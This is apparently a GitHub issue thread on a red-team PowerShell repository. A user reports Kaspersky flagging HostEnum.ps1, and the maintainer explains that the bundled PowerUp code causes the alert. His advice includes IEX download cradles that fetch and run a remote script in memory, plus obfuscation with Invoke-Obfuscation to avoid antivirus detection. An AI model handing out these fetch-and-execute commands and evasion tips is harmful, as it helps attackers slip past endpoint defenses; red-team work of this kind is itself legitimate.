### ISSUE TITLE
KAV detected

### ISSUE THREAD

**Issue by alex-bergman** [minisllc/red-team-scripts#2]
Good work! But KAV detect HostEnum.ps1 like "Trojan.Powershel.lGeneric" =(

**Comment by andrewchiles** [comment]
Hi Alex, 

Thanks for the note! The alert from Kaspersky AV is due to the recent addition of PowerUp code from the PowerSploit project. If you do not need the privesc checks provided by PowerUp then the easiest solution is to remove the following lines of code and everything below. All other features except the `-Privesc` switch will continue to function.
```
# Remove PowerUp code by deleting everything below this line
###########
# PowerUp
###########
<#
    Modified version of PowerUp (authored by @harmj0y) without the modification functions
....
```
**Additional thoughts:**
- Avoid writing the script to disk whenever possible by using a download cradle.
    * `IEX (New-Object Net.Webclient).downloadstring("https://domain/hostenum.ps1")`
    * `IEX (Invoke-WebRequest 'https://domain/hostenum.ps1')`
- Consider stripping all comments from the code or running an obfuscator such as [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) by Daniel Bohannon to prevent future issues. Of course, make sure you verify functionality after performing any obfuscation.

Hope that helps!

-Andrew
